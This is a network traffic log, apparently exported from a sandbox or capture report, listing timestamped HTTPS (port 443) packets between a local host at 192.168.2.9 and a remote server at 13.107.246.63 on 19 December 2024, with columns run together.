                                                                                                                                              Dec 19, 2024 07:52:13.951976061 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:13.954472065 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:13.954715967 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:14.061570883 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:14.067353964 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:14.067418098 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:14.067420959 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:14.067468882 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:14.070203066 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:14.070369005 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:14.074193954 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:14.158982992 CET49673443192.168.2.9204.79.197.203
                                                                                                                                              Dec 19, 2024 07:52:14.189935923 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:14.259244919 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:14.262397051 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:14.271042109 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:14.271111012 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:14.271143913 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:14.271193027 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:14.274173021 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:14.274770021 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:14.393899918 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:14.430553913 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:14.430627108 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:14.430793047 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:14.433731079 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:14.433950901 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:14.553441048 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:14.585731983 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:14.588454962 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:14.591243982 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:14.591329098 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:14.591329098 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:14.591494083 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:14.593950033 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:14.594132900 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:14.713530064 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:14.750685930 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:14.750751972 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:14.750837088 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:14.754488945 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:14.755331993 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:14.874835014 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:14.905503988 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:14.908890009 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:14.910175085 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:14.910217047 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:14.910309076 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:14.910310030 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:14.912688017 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:14.912727118 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:15.032192945 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:15.070904016 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:15.070986032 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:15.071085930 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:15.074187040 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:15.074309111 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:15.194418907 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:15.224704981 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:15.228837013 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:15.230678082 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:15.230726004 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:15.230848074 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:15.230914116 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:15.233793974 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:15.235219955 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:15.353285074 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:15.390902996 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:15.390983105 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:15.391038895 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:15.394263029 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:15.394418001 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:15.513942003 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:15.545201063 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:15.550404072 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:15.550422907 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:15.550498009 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:15.564141035 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:15.564961910 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:15.566174984 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:15.684863091 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:15.711153030 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:15.711227894 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:15.711302042 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:15.714073896 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:15.714103937 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:15.833683014 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:15.881524086 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:15.881546021 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:15.881669044 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:15.884310961 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:15.884407997 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:15.902816057 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:15.905107975 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:16.005455971 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:16.031018972 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:16.031033993 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:16.031088114 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:16.034028053 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:16.034054995 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:16.154016018 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:16.203380108 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:16.203484058 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:16.203670025 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:16.222990036 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:16.223025084 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:16.223177910 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:16.304785013 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:16.304944992 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:16.305979013 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:16.349164963 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:16.349271059 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:16.349277020 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:16.349355936 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:16.353111029 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:16.353256941 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:16.424791098 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:16.468975067 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:16.472995996 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:16.619976044 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:16.622601032 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:16.622692108 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:16.622734070 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:16.623769045 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:16.627386093 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:16.634996891 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:16.669524908 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:16.669626951 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:16.669641972 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:16.669718027 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:16.678005934 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:16.678320885 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:16.746951103 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:16.789170027 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:16.797843933 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:16.965851068 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:16.967930079 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:16.968072891 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:16.968559027 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:16.969969034 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:16.974728107 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:16.976546049 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:17.000353098 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.000368118 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.000447035 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:17.006376028 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:17.006946087 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:17.094899893 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.125837088 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.174312115 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.285876989 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.291302919 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:17.292045116 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.292090893 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:17.292114019 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.292169094 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:17.296235085 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:17.298587084 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:17.324223995 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.324295044 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:17.324337006 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.324393988 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:17.346735954 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:17.349168062 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:17.410979033 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.415824890 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.418102980 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.466583967 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.468658924 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.605653048 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.612807035 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.612936020 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.613032103 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:17.617799997 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:17.625546932 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:17.632736921 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:17.664267063 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.664289951 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.664377928 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:17.677920103 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:17.695043087 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:17.737348080 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.745063066 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.752665043 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.797468901 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.814615965 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.932348013 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.937942982 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:17.944607019 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.945030928 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:17.950242996 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:17.989567041 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:17.993160963 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:18.007069111 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:18.007164955 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:18.057457924 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:18.069761038 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:18.112854004 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:18.124264002 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:18.134341002 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:18.251013994 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:18.261984110 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:18.263011932 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:18.304941893 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:18.305960894 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:18.315920115 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:18.316015005 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:18.324120045 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:18.327724934 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:18.333693027 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:18.414560080 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:18.443805933 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:18.447277069 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:18.453257084 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:18.453463078 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:18.502649069 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:18.544370890 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:18.635842085 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:18.635926008 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:18.639239073 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:18.639281034 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:18.645237923 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:18.645430088 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:18.706418037 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:18.821857929 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:18.823247910 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:18.827636957 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:18.830285072 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:18.869064093 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:18.941433907 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:18.942732096 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:18.947134018 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:18.988568068 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.062299013 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.065664053 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:19.144061089 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.144176960 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:19.144180059 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.144234896 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:19.150279045 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:19.150726080 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:19.180579901 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.180644989 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:19.183168888 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:19.185447931 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.254158974 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.257267952 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:19.269918919 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.270406008 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.303239107 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.376859903 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.461961985 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.465451002 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:19.467442036 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.467494011 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:19.467567921 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.467613935 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:19.470088005 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:19.470216036 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:19.568856955 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.568967104 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:19.580657959 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:19.585143089 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.589610100 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.589694977 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.659270048 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.671812057 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:19.700870991 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.781830072 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.781917095 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:19.785603046 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:19.786839962 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.786879063 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.786917925 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:19.786992073 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:19.789783955 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:19.790744066 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:19.791512012 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.905313015 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.909768105 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.910334110 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.978427887 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:19.981024981 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:20.097218990 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:20.100524902 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:20.101229906 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:20.101497889 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:20.106472969 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:20.107254028 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:20.107302904 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:20.107362032 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:20.107544899 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:20.125437021 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:20.129380941 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:20.130218983 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:20.245017052 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:20.251821995 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:20.300035954 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:20.304888964 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:20.437077999 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:20.440366983 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:20.441003084 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:20.441109896 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:20.443229914 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:20.490884066 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:20.494373083 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:20.562743902 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:20.617063999 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:20.620538950 CET49706443192.168.2.913.107.246.63
